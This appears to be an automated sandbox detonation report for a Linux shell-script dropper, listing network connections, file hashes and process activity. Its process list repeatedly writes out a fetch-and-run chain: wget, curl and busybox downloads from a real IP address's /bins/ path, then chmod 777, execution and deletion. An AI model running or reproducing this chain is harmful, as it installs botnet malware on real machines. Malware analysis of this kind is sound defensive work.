[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE
[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/rm
[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/wget
[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/821-1-0xb6728000-0xb6739044-memory.dmp
memory/841-2-0xb6791000-0xb67a2044-memory.dmp
memory/871-3-0xb670e000-0xb671f044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-10 01:07
Reported
2024-11-10 01:09
Platform
debian9-mipsbe-20240729-en
Max time kernel
63s
Max time network
65s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
Processes
/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/chmod
[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/rm
[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/wget
[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/chmod
[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b
[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/rm
[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/wget
[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/chmod
[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy
[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/rm
[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/wget
[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/chmod
[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X
[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/rm
[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/wget
[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/chmod
[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w
[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/rm
[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/wget
[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/chmod
[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda
[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/rm
[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/rm
[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/wget
[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/chmod
[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM
[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/rm
[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/wget
[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/chmod
[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C
[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/rm
[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/wget
[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/chmod
[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp
[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/rm
[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/wget
[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/chmod
[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK
[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/rm
[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/wget
[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/chmod
[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE
[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/rm
[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/wget
[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/chmod
[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe
[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/rm
[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/wget
[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/chmod
[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw
[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/rm
[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/chmod
[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM
[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/rm
[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/wget
[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/chmod
[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C
[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/rm
[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/rm
[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/wget
[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/chmod
[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE
[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/rm
[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/wget
